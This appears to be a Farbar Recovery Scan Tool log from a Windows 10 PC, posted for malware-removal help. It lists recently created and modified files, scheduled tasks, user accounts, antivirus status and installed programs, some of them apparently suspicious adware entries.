        2017-03-15 09:39 - 2017-03-04 13:19 - 00376832 _____ (Microsoft Corporation) C:\Windows\system32\CryptoWinRT.dll
        2017-03-15 09:39 - 2017-03-04 13:19 - 00166912 _____ (Microsoft Corporation) C:\Windows\system32\Tabbtn.dll
        2017-03-15 09:39 - 2017-03-04 13:19 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\tabcal.exe
        2017-03-15 09:39 - 2017-03-04 13:18 - 01227264 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
        2017-03-15 09:39 - 2017-03-04 13:18 - 00320512 _____ (Microsoft Corporation) C:\Windows\regedit.exe
        2017-03-15 09:39 - 2017-03-04 13:18 - 00198656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\indexeddbserver.dll
        2017-03-15 09:39 - 2017-03-04 13:17 - 01082368 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll
        2017-03-15 09:39 - 2017-03-04 13:17 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\clusapi.dll
        2017-03-15 09:39 - 2017-03-04 13:17 - 00442368 _____ (Microsoft Corporation) C:\Windows\system32\PlayToDevice.dll
        2017-03-15 09:39 - 2017-03-04 13:17 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\fhcfg.dll
        2017-03-15 09:39 - 2017-03-04 13:16 - 03289088 _____ (Microsoft Corporation) C:\Windows\system32\mispace.dll
        2017-03-15 09:39 - 2017-03-04 13:16 - 00649216 _____ (Microsoft Corporation) C:\Windows\system32\vds.exe
        2017-03-15 09:39 - 2017-03-04 13:16 - 00583168 _____ (Microsoft Corporation) C:\Windows\system32\BootMenuUX.dll
        2017-03-15 09:39 - 2017-03-04 13:16 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\dialclient.dll
        2017-03-15 09:39 - 2017-03-04 13:15 - 09130496 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
        2017-03-15 09:39 - 2017-03-04 13:15 - 02860032 _____ (Microsoft Corporation) C:\Windows\system32\storagewmi.dll
        2017-03-15 09:39 - 2017-03-04 13:15 - 01443328 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe
        2017-03-15 09:39 - 2017-03-04 13:14 - 04749312 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_nt.dll
        2017-03-15 09:39 - 2017-03-04 13:14 - 01562112 _____ (Microsoft Corporation) C:\Windows\system32\vssapi.dll
        2017-03-15 09:39 - 2017-03-04 13:14 - 01547264 _____ (Microsoft Corporation) C:\Windows\system32\wbengine.exe
        2017-03-15 09:39 - 2017-03-04 13:14 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\resutils.dll
        2017-03-15 09:39 - 2017-03-04 13:14 - 00279552 _____ (Microsoft Corporation) C:\Windows\system32\PlayToReceiver.dll
        2017-03-15 09:39 - 2017-03-04 13:14 - 00167936 _____ (Microsoft Corporation) C:\Windows\system32\ErrorDetails.dll
        2017-03-15 09:39 - 2017-03-04 13:14 - 00130560 _____ (Microsoft Corporation) C:\Windows\system32\SpaceAgent.exe
        2017-03-15 09:39 - 2017-03-04 13:13 - 05114368 _____ (Microsoft Corporation) C:\Windows\system32\cdp.dll
        2017-03-15 09:39 - 2017-03-04 13:13 - 00961024 _____ (Microsoft Corporation) C:\Windows\system32\imapi2fs.dll
        2017-03-15 09:39 - 2017-03-04 13:13 - 00947200 _____ (Microsoft Corporation) C:\Windows\system32\wsp_sr.dll
        2017-03-15 09:39 - 2017-03-04 13:13 - 00937472 _____ (Microsoft Corporation) C:\Windows\system32\MCRecvSrc.dll
        2017-03-15 09:39 - 2017-03-04 13:13 - 00628736 _____ (Microsoft Corporation) C:\Windows\system32\uReFS.dll
        2017-03-15 09:39 - 2017-03-04 13:13 - 00539136 _____ (Microsoft Corporation) C:\Windows\system32\PlayToManager.dll
        2017-03-15 09:39 - 2017-03-04 13:13 - 00222720 _____ (Microsoft Corporation) C:\Windows\system32\WorkFoldersShell.dll
        2017-03-15 09:39 - 2017-03-04 13:13 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\CameraCaptureUI.dll
        2017-03-15 09:39 - 2017-03-04 13:13 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\MultiDigiMon.exe
        2017-03-15 09:39 - 2017-03-04 13:12 - 01692160 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.oneco re.dll
        2017-03-15 09:39 - 2017-03-04 13:12 - 01040896 _____ (Microsoft Corporation) C:\Windows\system32\NaturalLanguage6.dll
        2017-03-15 09:39 - 2017-03-04 13:12 - 00828416 _____ (Microsoft Corporation) C:\Windows\system32\appwiz.cpl
        2017-03-15 09:39 - 2017-03-04 13:12 - 00467968 _____ (Microsoft Corporation) C:\Windows\system32\Geolocation.dll
        2017-03-15 09:39 - 2017-03-04 13:11 - 04474368 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
        2017-03-15 09:39 - 2017-03-04 13:11 - 02611200 _____ (Microsoft Corporation) C:\Windows\system32\gameux.dll
        2017-03-15 09:39 - 2017-03-04 13:11 - 02278400 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
        2017-03-15 09:39 - 2017-03-04 13:11 - 01656832 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
        2017-03-15 09:39 - 2017-03-04 13:11 - 01643008 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Speech.dll
        2017-03-15 09:39 - 2017-03-04 13:11 - 01312768 _____ (Microsoft Corporation) C:\Windows\system32\SensorDataService.exe
        2017-03-15 09:39 - 2017-03-04 13:11 - 00818176 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
        2017-03-15 09:39 - 2017-03-04 13:11 - 00572416 _____ (Microsoft Corporation) C:\Windows\system32\PhotoScreensaver.scr
        2017-03-15 09:39 - 2017-03-04 13:10 - 06664192 _____ (Microsoft Corporation) C:\Windows\system32\mspaint.exe
        2017-03-15 09:39 - 2017-03-04 13:10 - 01586176 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Globalization.dll
        2017-03-15 09:39 - 2017-03-04 13:10 - 00960000 _____ (Microsoft Corporation) C:\Windows\system32\modernexecserver.dll
        2017-03-15 09:39 - 2017-03-04 13:10 - 00770560 _____ (Microsoft Corporation) C:\Windows\system32\bisrv.dll
        2017-03-15 09:39 - 2017-03-04 13:10 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Midi.dll
        2017-03-15 09:39 - 2017-03-04 13:10 - 00104960 _____ (Microsoft Corporation) C:\Windows\system32\WorkFolders.exe
        2017-03-15 09:39 - 2017-03-04 13:09 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\UserLanguagesCpl.dll
        2017-03-15 09:39 - 2017-03-04 13:08 - 01714688 _____ (Microsoft Corporation) C:\Windows\system32\dui70.dll
        2017-03-15 09:39 - 2017-03-04 13:08 - 00629248 _____ (Microsoft Corporation) C:\Windows\system32\hgcpl.dll
        2017-03-15 09:39 - 2017-03-04 13:07 - 02914816 _____ (Microsoft Corporation) C:\Windows\system32\CertEnroll.dll
        2017-03-15 09:39 - 2017-03-04 13:07 - 02512384 _____ (Microsoft Corporation) C:\Windows\system32\themecpl.dll
        2017-03-15 09:39 - 2017-03-04 13:07 - 01490944 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
        2017-03-15 09:39 - 2017-03-04 13:07 - 01064448 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncCore.dll
        2017-03-15 09:39 - 2017-03-04 13:07 - 00716800 _____ (Microsoft Corporation) C:\Windows\system32\ShareHost.dll
        2017-03-15 09:39 - 2017-03-04 13:07 - 00707584 _____ (Microsoft Corporation) C:\Windows\system32\LogonController.dll
        2017-03-15 09:39 - 2017-03-04 13:07 - 00389632 _____ (Microsoft Corporation) C:\Windows\system32\stobject.dll
        2017-03-15 09:39 - 2017-03-04 13:06 - 05384192 _____ (Microsoft) C:\Windows\system32\dbgeng.dll
        2017-03-15 09:39 - 2017-03-04 13:06 - 04708864 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
        2017-03-15 09:39 - 2017-03-04 13:06 - 04060672 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbon.dll
        2017-03-15 09:39 - 2017-03-04 13:06 - 03614720 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
        2017-03-15 09:39 - 2017-03-04 13:06 - 02317824 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
        2017-03-15 09:39 - 2017-03-04 13:06 - 00881664 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
        2017-03-15 09:39 - 2017-03-04 13:06 - 00483328 _____ (Microsoft Corporation) C:\Windows\system32\twinapi.dll
        2017-03-15 09:39 - 2017-03-04 13:05 - 01726976 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Immersive.dll
        2017-03-15 09:39 - 2017-03-04 13:05 - 01121280 _____ (Microsoft Corporation) C:\Windows\system32\aadtb.dll
        2017-03-15 09:39 - 2017-03-04 13:05 - 00180224 _____ (Microsoft Corporation) C:\Windows\system32\enrollmentapi.dll
        2017-03-15 09:39 - 2017-03-04 13:04 - 00035328 _____ (Microsoft Corporation) C:\Windows\system32\spaceman.exe
        2017-03-15 09:39 - 2017-03-04 13:03 - 01817088 _____ (Microsoft Corporation) C:\Windows\system32\ResetEngine.dll
        2017-03-15 09:39 - 2017-03-04 13:02 - 00510464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhotoScreensaver.scr
        2017-03-15 09:39 - 2017-03-04 13:01 - 03478528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIRibbon.dll
        2017-03-15 09:39 - 2016-07-16 09:29 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\CspCellularSettings.dll
        2017-03-15 09:39 - 2016-07-16 09:28 - 00125440 _____ (Microsoft Corporation) C:\Windows\system32\EnterpriseAPNCsp.dll
        2017-03-15 09:39 - 2016-07-16 09:26 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\CfgSPCellular.dll
        2017-03-15 09:38 - 2017-03-04 13:35 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\UIRibbonRes.dll
        2017-03-15 09:38 - 2017-03-04 13:26 - 00584192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIRibbonRes.dll
        2017-03-15 09:38 - 2016-05-30 01:38 - 08886976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneDriveSetup.exe
        2017-03-14 09:31 - 2017-03-14 09:31 - 00000600 _____ C:\Users\ASUS\AppData\Local\PUTTY.RND
        2017-03-13 17:43 - 2017-03-14 09:32 - 00002848 _____ C:\Windows\SysWOW64\BattleP.ini
        2017-03-13 17:43 - 2017-03-14 09:32 - 00001520 _____ C:\Windows\SysWOW64\BattlePOff.ini
        2017-03-13 17:43 - 2017-03-14 09:32 - 00001520 _____ C:\Windows\system32\BattlePOff.ini
        2017-03-13 17:42 - 2011-07-27 08:39 - 00420864 _____ (BattlePing) C:\Windows\system32\BattleP64.dll
        2017-03-13 17:42 - 2011-07-27 08:38 - 00307200 _____ (BattlePing) C:\Windows\SysWOW64\BattleP.dll
        2017-03-13 09:32 - 2017-03-13 09:32 - 00000075 _____ C:\Windows\wininit.ini
        2017-03-13 09:17 - 2017-03-31 21:50 - 00002820 _____ C:\Windows\System32\Tasks\snp
        2017-03-13 09:17 - 2017-03-31 21:50 - 00002400 _____ C:\Windows\System32\Tasks\snf
        2017-03-13 09:16 - 2017-03-13 09:16 - 00000000 ____D C:\ProgramData\Zaamlas
        2017-03-13 09:15 - 2017-03-31 21:50 - 00002188 _____ C:\Windows\System32\Tasks\hostTask
        2017-03-13 09:15 - 2017-03-22 06:29 - 00000000 ____D C:\Users\ASUS\AppData\Local\WikiThemes
        2017-03-13 09:14 - 2017-03-13 10:02 - 00000000 __SHD C:\Users\ASUS\AppData\Local\svchost
        2017-03-13 09:12 - 2017-03-31 23:05 - 00000000 ____D C:\Program Files (x86)\Google
        2017-03-13 09:12 - 2017-03-13 09:18 - 50053120 _____ C:\Program Files (x86)\GUTD09C.tmp
        2017-03-13 09:12 - 2017-03-13 09:12 - 00000000 ____D C:\Program Files (x86)\GUMD09B.tmp
        2017-03-13 08:00 - 2017-03-13 08:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online
        2017-03-13 07:42 - 2017-03-13 08:09 - 00000000 ____D C:\ProgramData\Solid State Networks
        2017-03-13 07:42 - 2017-03-13 07:58 - 00000000 ____D C:\Users\ASUS\Desktop\Ragnarok Online Installer
        2017-03-13 07:22 - 2017-03-13 09:34 - 00000000 ____D C:\Program Files (x86)\774ba57a-96b9-4cb7-98c5-e1ed92c03dee1489364542
        2017-03-13 07:22 - 2017-03-13 07:22 - 00000000 _____ C:\TOSTACK
        2017-03-11 06:17 - 2017-03-11 06:17 - 00046408 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
        2017-03-11 06:17 - 2017-03-11 06:17 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
        2017-03-11 06:17 - 2017-03-11 06:17 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
        2017-03-11 06:17 - 2017-03-11 06:17 - 00045672 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
        2017-03-09 13:41 - 2017-03-30 16:45 - 00000000 ____D C:\Program Files (x86)\MK
        2017-03-08 13:20 - 2017-03-08 13:20 - 00000000 ____D C:\Users\ASUS\AppData\Local\TeamSpeak 3
        2017-03-08 13:20 - 2017-03-08 13:20 - 00000000 ____D C:\Users\ASUS.TeamSpeak 3
        2017-03-08 13:20 - 2017-03-08 13:20 - 00000000 ____D C:\Users\ASUS.QtWebEngineProcess
        2017-03-08 13:19 - 2017-03-23 08:58 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\TS3Client
        2017-03-08 13:15 - 2017-03-08 13:15 - 00000864 _____ C:\Users\Public\Desktop\TeamSpeak 3 Client.lnk
        2017-03-08 13:15 - 2017-03-08 13:15 - 00000814 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client.lnk
        2017-03-07 22:59 - 2017-03-24 20:23 - 00000141 _____ C:\Users\ASUS\Desktop\ID PASS.txt
        2017-03-07 11:17 - 2017-03-31 21:51 - 00002220 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
        2017-03-07 11:17 - 2017-03-07 11:17 - 00000863 _____ C:\Users\Public\Desktop\CCleaner.lnk
        2017-03-07 11:17 - 2017-03-07 11:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
        2017-03-07 11:17 - 2017-03-07 11:17 - 00000000 ____D C:\Program Files\CCleaner
        2017-03-07 08:15 - 2017-03-07 08:15 - 00007605 _____ C:\Users\ASUS\AppData\Local\Resmon.ResmonCfg
        2017-03-03 11:34 - 2017-03-03 11:34 - 00001123 _____ C:\Users\Public\Desktop\Hotspot Shield.lnk
        2017-03-03 11:33 - 2017-03-03 11:35 - 00000000 ____D C:\Program Files (x86)\Hotspot Shield
        2017-03-03 11:33 - 2017-03-03 11:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hotspot Shield
        2017-03-03 11:33 - 2017-03-03 11:34 - 00000000 ____D C:\ProgramData\Hotspot Shield

        ==================== One Month Modified files and folders ========

        (If an entry is included in the fixlist, the file/folder will be moved.)

        2017-04-01 00:03 - 2017-02-15 12:57 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\Skype
        2017-04-01 00:01 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\AppReadiness
        2017-03-31 22:57 - 2017-02-15 16:45 - 00000000 __SHD C:\Users\ASUS\wc
        2017-03-31 22:51 - 2016-07-16 18:47 - 00000000 ___HD C:\Program Files\WindowsApps
        2017-03-31 22:50 - 2017-03-01 19:40 - 00000000 ____D C:\Program Files (x86)\Explorer
        2017-03-31 22:31 - 2017-02-14 22:36 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\MPC-HC
        2017-03-31 22:31 - 2017-02-14 22:01 - 00000000 ____D C:\Users\ASUS\AppData\Local\CrashDumps
        2017-03-31 22:31 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\LiveKernelReports
        2017-03-31 22:31 - 2016-07-16 18:45 - 00000000 ____D C:\Windows\INF
        2017-03-31 22:10 - 2017-02-14 16:49 - 00000000 ____D C:\ProgramData\MFAData
        2017-03-31 21:50 - 2017-02-18 23:27 - 00003510 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachine UA
        2017-03-31 21:50 - 2017-02-18 23:27 - 00003286 _____ C:\Windows\System32\Tasks\DropboxUpdateTaskMachine Core
        2017-03-31 21:50 - 2017-02-18 23:27 - 00000936 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
        2017-03-31 21:50 - 2017-02-18 23:27 - 00000932 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
        2017-03-31 21:50 - 2017-02-15 10:42 - 00004874 _____ C:\Windows\System32\Tasks\Thoveent Engine
        2017-03-31 21:50 - 2017-02-14 16:52 - 00003180 _____ C:\Windows\System32\Tasks\klcp_update
        2017-03-31 21:50 - 2017-02-14 16:07 - 00002604 _____ C:\Windows\System32\Tasks\KMS8Server
        2017-03-31 21:50 - 2017-02-14 16:07 - 00002258 _____ C:\Windows\System32\Tasks\KMS8
        2017-03-31 21:50 - 2017-02-14 15:53 - 00002400 _____ C:\Windows\System32\Tasks\ASUS USB Charger Plus
        2017-03-31 21:33 - 2017-02-21 14:48 - 00047170 _____ C:\Program Files (x86)\metadata
        2017-03-31 21:33 - 2017-02-21 14:48 - 00000040 _____ C:\Program Files (x86)\settings.dat
        2017-03-31 21:33 - 2017-02-21 14:48 - 00000000 ____D C:\Program Files (x86)\reports
        2017-03-31 21:22 - 2017-02-16 10:07 - 00000000 ____D C:\Users\ASUS\AppData\Local\Spotify
        2017-03-31 21:22 - 2017-02-14 22:47 - 00039644 _____ C:\Users\ASUS\Desktop\Ragnarok.xlsx
        2017-03-31 21:21 - 2017-02-15 14:21 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\Spotify
        2017-03-31 20:59 - 2016-08-15 14:18 - 00000000 ____D C:\Users\ASUS
        2017-03-31 20:57 - 2017-02-23 11:41 - 00004146 _____ C:\Windows\System32\Tasks\User_Feed_Synchronizatio n-{60208B48-6CA6-4424-8E02-7F65C7F3A413}
        2017-03-31 20:33 - 2016-08-15 14:10 - 00000000 ____D C:\Windows\system32\SleepStudy
        2017-03-31 16:15 - 2016-08-15 14:22 - 00005620 _____ C:\Windows\system32\PerfStringBackup.INI
        2017-03-31 16:12 - 2017-02-14 15:04 - 00000000 ____D C:\ProgramData\NVIDIA
        2017-03-31 16:09 - 2016-08-15 14:34 - 00000000 __SHD C:\Users\ASUS\IntelGraphicsProfiles
        2017-03-31 16:08 - 2016-08-15 14:10 - 00000006 ____H C:\Windows\Tasks\SA.DAT
        2017-03-31 16:07 - 2016-07-16 13:04 - 00262144 _____ C:\Windows\system32\config\BBI
        2017-03-31 10:09 - 2016-07-16 13:04 - 00032768 _____ C:\Windows\system32\config\ELAM
        2017-03-31 07:19 - 2017-02-19 00:00 - 00000000 ___RD C:\Users\ASUS\Dropbox
        2017-03-31 04:44 - 2017-02-15 10:42 - 00000000 ____D C:\Program Files (x86)\Coefutain
        2017-03-31 02:37 - 2017-02-14 16:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
        2017-03-31 02:30 - 2017-02-14 16:48 - 00003668 _____ C:\Windows\System32\Tasks\AVG EUpdate Task
        2017-03-30 19:46 - 2017-02-18 23:27 - 00000000 ____D C:\Users\ASUS\AppData\Local\Dropbox
        2017-03-28 22:26 - 2017-02-17 16:10 - 00000000 _____ C:\Users\Public\Documents\report.dat
        2017-03-28 22:18 - 2017-02-17 16:42 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Mozilla
        2017-03-28 18:56 - 2017-03-01 19:41 - 00000000 _____ C:\Windows\SysWOW64\4
        2017-03-28 18:56 - 2017-03-01 19:41 - 00000000 _____ C:\Windows\SysWOW64\3
        2017-03-28 18:56 - 2017-02-17 16:10 - 00000000 _____ C:\Users\Public\Documents\temp.dat
        2017-03-27 07:05 - 2016-08-15 14:18 - 00000000 ____D C:\Users\ASUS\AppData\Local\Packages
        2017-03-25 08:17 - 2017-02-18 23:27 - 00000000 ____D C:\Program Files (x86)\Dropbox
        2017-03-25 00:55 - 2017-02-18 15:20 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\GRF Editor
        2017-03-24 14:47 - 2017-02-14 15:03 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
        2017-03-24 14:46 - 2017-02-14 15:04 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
        2017-03-24 14:46 - 2017-02-14 14:57 - 00000000 ____D C:\Program Files\NVIDIA Corporation
        2017-03-22 16:45 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\rescache
        2017-03-21 23:47 - 2017-02-15 13:02 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\Sony
        2017-03-21 23:35 - 2017-02-15 13:03 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\NVIDIA
        2017-03-19 07:58 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\system32\appraiser
        2017-03-19 07:58 - 2016-07-16 18:36 - 00000000 ____D C:\Windows\CbsTemp
        2017-03-17 06:31 - 2017-02-18 17:46 - 00001951 _____ C:\Windows\NvContainerRecovery.bat
        2017-03-17 06:16 - 2017-02-14 15:04 - 06401984 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
        2017-03-17 06:16 - 2017-02-14 15:04 - 02477504 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
        2017-03-17 06:16 - 2017-02-14 15:04 - 01762752 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
        2017-03-17 06:16 - 2017-02-14 15:04 - 00549944 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
        2017-03-17 06:16 - 2017-02-14 15:04 - 00392128 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
        2017-03-17 06:16 - 2017-02-14 15:04 - 00081856 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
        2017-03-16 16:39 - 2017-02-14 15:04 - 07813427 _____ C:\Windows\system32\nvcoproc.bin
        2017-03-16 10:08 - 2016-08-15 14:19 - 00000000 __RHD C:\Users\Public\AccountPictures
        2017-03-16 10:05 - 2016-08-15 14:10 - 04849688 _____ C:\Windows\system32\FNTCACHE.DAT
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ___SD C:\Windows\SysWOW64\F12
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ___SD C:\Windows\system32\F12
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ___RD C:\Windows\PrintDialog
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ___RD C:\Program Files\Windows Defender
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\SysWOW64\setup
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\SysWOW64\en-GB
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\system32\setup
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\system32\oobe
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\system32\en-GB
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\ShellExperiences
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\PolicyDefinitions
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\bcastdvr
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
        2017-03-16 10:01 - 2016-07-16 18:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender
        2017-03-16 09:41 - 2017-02-16 12:23 - 138634176 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
        2017-03-13 17:43 - 2017-02-15 16:45 - 00000000 ____D C:\Users\ASUS\AppData\Local\BattlePing
        2017-03-13 09:12 - 2017-02-14 16:06 - 00000000 ____D C:\Users\ASUS\AppData\Local\Google
        2017-03-13 07:19 - 2016-07-16 18:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
        2017-03-12 14:19 - 2017-02-14 16:29 - 00000000 ____D C:\Users\ASUS\AppData\Local\Adobe
        2017-03-12 14:19 - 2016-08-15 14:19 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\Adobe
        2017-03-07 11:19 - 2016-08-15 07:08 - 00000000 ____D C:\Windows\Panther
        2017-03-06 15:50 - 2017-02-15 12:56 - 00000000 ____D C:\ProgramData\Skype
        2017-03-06 15:50 - 2016-08-15 14:22 - 00000000 ____D C:\ProgramData\Package Cache
        2017-03-06 09:09 - 2017-02-15 14:12 - 00000000 ____D C:\Users\ASUS\AppData\Local\Razer
        2017-03-06 09:04 - 2017-02-15 14:12 - 00000000 ____D C:\ProgramData\Razer
        2017-03-06 09:04 - 2017-02-15 14:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer
        2017-03-03 15:34 - 2016-07-16 18:47 - 00000000 ____D C:\Windows\system32\NDF

        ==================== Files in the root of some directories =======

        2017-03-13 09:12 - 2017-03-13 09:18 - 50053120 _____ () C:\Program Files (x86)\GUTD09C.tmp
        2017-02-21 14:48 - 2017-03-31 21:33 - 0047170 _____ () C:\Program Files (x86)\metadata
        2017-02-21 14:48 - 2017-03-31 21:33 - 0000040 _____ () C:\Program Files (x86)\settings.dat
        2017-02-15 16:45 - 2017-02-15 16:45 - 0000038 ___SH () C:\Users\ASUS\AppData\Local\1754111884ee9ab5277ca0 0.95260103
        2017-03-14 09:31 - 2017-03-14 09:31 - 0000600 _____ () C:\Users\ASUS\AppData\Local\PUTTY.RND
        2017-03-07 08:15 - 2017-03-07 08:15 - 0007605 _____ () C:\Users\ASUS\AppData\Local\Resmon.ResmonCfg
        [HEADING=1]Files to move or delete:[/HEADING]
        C:\Users\Public\VOIP.dat

        ==================== Bamital & volsnap ======================

        (There is no automatic fix for files that do not pass verification.)

        C:\Windows\system32\winlogon.exe => File is digitally signed
        C:\Windows\system32\wininit.exe => File is digitally signed
        C:\Windows\explorer.exe => File is digitally signed
        C:\Windows\SysWOW64\explorer.exe => File is digitally signed
        C:\Windows\system32\svchost.exe => File is digitally signed
        C:\Windows\SysWOW64\svchost.exe => File is digitally signed
        C:\Windows\system32\services.exe => File is digitally signed
        C:\Windows\system32\User32.dll => File is digitally signed
        C:\Windows\SysWOW64\User32.dll => File is digitally signed
        C:\Windows\system32\userinit.exe => File is digitally signed
        C:\Windows\SysWOW64\userinit.exe => File is digitally signed
        C:\Windows\system32\rpcss.dll => File is digitally signed
        C:\Windows\system32\dnsapi.dll => File is digitally signed
        C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
        C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

        LastRegBack: 2017-03-26 05:45
        [HEADING=1]==================== End of FRST.txt ============================

        Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
        Ran by ASUS (01-04-2017 00:17:20)
        Running from C:\Users\ASUS\Desktop
        Windows 10 Enterprise Version 1607 (X64) (2016-08-15 07:17:37)
        Boot Mode: Normal[/HEADING]
        ==================== Accounts: =============================

        Administrator (S-1-5-21-2746278279-2939389576-4119914495-500 - Administrator - Enabled)
        ASUS (S-1-5-21-2746278279-2939389576-4119914495-1001 - Administrator - Enabled) => C:\Users\ASUS
        DefaultAccount (S-1-5-21-2746278279-2939389576-4119914495-503 - Limited - Disabled)
        defaultuser0 (S-1-5-21-2746278279-2939389576-4119914495-1000 - Limited - Disabled) => C:\Users\defaultuser0
        Guest (S-1-5-21-2746278279-2939389576-4119914495-501 - Limited - Disabled)

        ==================== Security Center ========================

        (If an entry is included in the fixlist, it will be removed.)

        AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
        AV: AVG AntiVirus Free Edition (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413}
        AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
        AS: AVG AntiVirus Free Edition (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE}

        ==================== Installed Programs ======================

        (Only the adware programs with “Hidden” flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

        ACDSee Pro 3 (HKLM-x32...{1B280FAF-AE10-4E31-A41A-DB3917D651DC}) (Version: 3.0.355 - ACD Systems International Inc.)
        Adobe Flash Player 23 NPAPI (HKLM-x32...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated)
        Adobe Photoshop CS6 (HKLM-x32...{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
        Adobe Reader XI (HKLM-x32...{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.00 - Adobe Systems Incorporated)
